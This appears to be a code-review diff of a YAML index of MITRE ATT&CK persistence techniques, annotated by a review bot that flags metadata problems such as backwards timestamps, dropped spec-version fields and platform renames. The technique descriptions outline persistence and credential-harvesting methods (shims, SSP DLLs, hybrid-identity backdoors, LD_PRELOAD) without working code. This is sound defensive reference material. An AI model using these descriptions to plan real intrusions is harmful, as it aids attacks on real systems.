+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
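Review bot: the new `T1098.007` entry (and the regenerated `T1137.005` above it) ends with `atomic_tests: []` and no `identifier:` key, while `T1176` and `T1505.005` in this same patch carry `identifier: T1176` and `identifier: T1505.005` before `atomic_tests`; if the index generators key on `identifier`, the new technique is silently skipped, so check which field they read. Two changes matter to downstream consumers: `T1137.005` moves platform from `Office 365` to `Office Suite` (with `x_mitre_version` 1.1 to 1.2 and `x_mitre_permissions_required` dropped), so any filter on the old platform string loses this technique; and `T1098.007` ships with `x_mitre_detection: ''` and lists macOS although its description only covers Windows (`net localgroup`, `net group`) and Linux (`usermod`). Two wording issues originate upstream and should be fixed in ATT&CK rather than here: `PRPR_RULE_MSG_NAME` in the T1137.005 detection text (present in both the removed and the added lines) is a typo for the MAPI property `PR_RULE_MSG_NAME`, and "the sudoers group" in the new T1098.007 description is loose, since `/etc/sudoers` is the policy file and the group is `sudo` on Debian-derived and `wheel` on RHEL-derived systems.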
@@ -29502,7 +29936,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
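Review bot: `modified` for T1546.011 moves backwards, from `'2022-04-25T14:00:00.188Z'` to `'2020-11-10T18:29:31.094Z'`, so the regenerated object is older than the one it replaces. The same regression appears for T1037.002, T1205, T1525 and T1547.005 further down, and those objects also keep `x_mitre_attack_spec_version: 2.1.0` or lose the field outright while the rest of the patch moves to 3.2.0, which looks like a subset of techniques being read from a stale STIX bundle or cached copy. Please confirm which ATT&CK release the generator consumed and regenerate these entries before merging; as it stands the index mixes two ATT&CK versions.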
@@ -29557,13 +29991,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
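Review bot: T1546.011 here loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` and gets nothing back, while retaining `x_mitre_permissions_required: - Administrator`; together with the 2020 `modified` timestamp in the previous hunk, that is the shape of an ATT&CK object from before the spec-version field existed, which supports the stale-source concern for this technique. The T1547.010 `modified` bump to `'2024-09-12T15:26:17.886Z'` in the same hunk is the expected direction.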
@@ -29624,9 +30056,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -29635,7 +30067,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -29688,7 +30119,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
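Review bot: T1037.002 `modified` goes from `'2022-05-11T14:00:00.188Z'` back to `'2022-04-20T16:42:05.094Z'`, the same backwards regression seen on T1546.011 in this patch; the next hunk shows the object still on `x_mitre_attack_spec_version: 2.1.0`. Treat this technique as coming from the older source and regenerate it with the others.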
@@ -29709,12 +30140,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
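Review bot: T1205 `modified` goes from `'2022-11-08T14:00:00.188Z'` back to `'2022-10-19T23:08:40.603Z'`, and the following hunk shows it retaining `x_mitre_attack_spec_version: 2.1.0` while only `spec_version: '2.1'` is dropped; another instance of the regenerated object being older than the one it replaces, so it belongs in the same fix as T1546.011 and T1037.002.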
@@ -29798,11 +30228,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -29815,7 +30244,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -29828,7 +30256,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -29858,7 +30285,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -29890,7 +30318,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
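Review bot: T1525 `modified` goes from `'2022-05-11T14:00:00.188Z'` back to `'2022-03-08T21:27:49.094Z'`, and the following hunk removes `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` without adding 3.2.0 while keeping `x_mitre_permissions_required: - User`; same stale-object symptom as the other backwards `modified` changes in this patch, so include it in the regeneration.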
@@ -29912,8 +30340,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -29939,7 +30365,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
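Review bot: T1547.005 `modified` goes from `'2021-04-29T14:49:39.188Z'` back to `'2020-03-25T15:42:48.910Z'`, the oldest of the backwards timestamps in this patch, and the following hunk strips its spec-version fields while keeping `x_mitre_permissions_required: - Administrator`. This is the clearest sign that a subset of objects came from a pre-2021 bundle; regenerate alongside T1546.011, T1037.002, T1205 and T1525.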
@@ -29965,36 +30391,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
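Review bot: the `(Citation: Azure AD Hybrid Identity)` key on the third `+` line, and the `(Citation: AADInternals Azure AD On-Prem to Cloud)` and `(Citation: Mandiant Azure AD Backdoors)` keys in the unchanged context, correctly keep the old product name while the surrounding prose moves to "Entra ID": these are lookup keys that must match `source_name` entries under `external_references`, not prose. Any follow-up search-and-replace of "Azure AD" in this file must skip everything inside `(Citation: ...)`, or the references will stop resolving.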
@@ -30002,9 +30426,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -30013,21 +30437,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
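Review bot: the substantive change in this hunk is the platform consolidation (`Azure AD`, `Google Workspace` and `Office 365` removed, `Office Suite` and `Identity Provider` added) with the matching `x_mitre_version` bump from '1.0' to '1.1'; any downstream per-platform index that filters on the old names will no longer select this technique, so the index generator needs a mapping for the new platform names before this is merged. The other `-`/`+` pairs here (`x_mitre_is_subtechnique`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_contributors`) are the same values re-emitted in a different key order and carry no change.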
@@ -30067,13 +30492,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
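Review bot: `spec_version: '2.1'` is removed here with no replacement, and the same removal repeats for every object in this file (T1543.004, T1505.003, T1547.003, T1546.005 and so on). If anything downstream still loads these `technique:` blocks as STIX 2.1 objects, the required `spec_version` property is now missing; please confirm in the PR description that consumers no longer expect it, or keep the property. The `x_mitre_attack_spec_version: 2.1.0` and `x_mitre_modified_by_ref` lines removed alongside it are re-added earlier in the same object (previous hunk), so those two are reordering only.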
@@ -30150,12 +30572,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30174,6 +30595,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -30181,7 +30603,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -30201,29 +30622,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1505.003:
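Review bot: only two reference entries change substantively here, the CreateProcess and WinExec URLs moving from plain-http `msdn.microsoft.com` to `https://learn.microsoft.com` with the retrieval date updated to September 12, 2024; the Environment Property and WinExec blocks are otherwise moved, not edited, which doubles the hunk size. Since `x_mitre_version` stays at '1.0' (context in the previous hunk), this is a reference-only refresh; stating that in the PR description saves the next reader from hunting for a content change. The `Windows NT Command Shell` entry still points at a `previous-versions` URL with a 2014 retrieval date and may want the same treatment upstream.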
@@ -30300,12 +30723,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30320,6 +30742,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -30328,18 +30751,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
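Review bot: the key reordering in this object makes the diff hard to review: `x_mitre_modified_by_ref` is added here at the top of the block and removed from the bottom in the next hunk, and `x_mitre_attack_spec_version: 3.2.0` was added in the previous hunk and is likewise removed further down. The real change is the platform list (`Azure AD`, `Office 365`, `Google Workspace` replaced by `Office Suite`, `Identity Provider`) and the '1.3' to '1.4' version bump. If the exporter can emit keys in a stable order (for example the upstream STIX order it now appears to follow, applied consistently to all objects), future syncs would show only the substantive lines.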
@@ -30371,9 +30794,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -30445,7 +30865,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -30472,7 +30891,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
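Review bot: the `modified` timestamp for T1546.005 moves backwards, from 2021-04-29 to 2020-03-24, and the same happens for T1546.012, T1574.005, T1542.002, T1546.009, T1547.015 and T1205.001 later in this diff. The removed values all share the suffix `14:00:00.188Z` or `14:49:39.188Z`, which looks like a synthesized stamp, while the new values look like the upstream STIX `modified` fields; if any consumer merges on "newest modified wins" these objects will now be treated as older than the copy it already holds. Please confirm the regression is intended and say so in the PR description.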
@@ -30498,13 +30917,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
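Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1546.005 with no replacement, whereas T1078.004 above gets `3.2.0` added in its place; the same unreplaced removal occurs for T1546.012, T1574.005, T1542.002, T1546.009, T1547.015 and T1205.001 further down. The file therefore ends up with a mix of objects that carry the field and objects that do not. A validator that requires `x_mitre_attack_spec_version` on every technique will now fail on the latter set; either backfill the field for those objects or document that its absence is expected for objects not re-exported upstream.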
@@ -30625,7 +31042,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -30697,7 +31113,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests: []
T1547.004:
@@ -30767,7 +31182,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -30877,7 +31291,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -30931,7 +31344,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -30964,8 +31377,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1574.005:
@@ -30996,7 +31407,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31031,12 +31442,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31113,7 +31522,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1136.002:
@@ -31167,7 +31575,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests: []
T1542.002:
@@ -31199,7 +31606,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31229,55 +31636,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
- type: attack-pattern
- created: '2019-11-07T20:29:17.788Z'
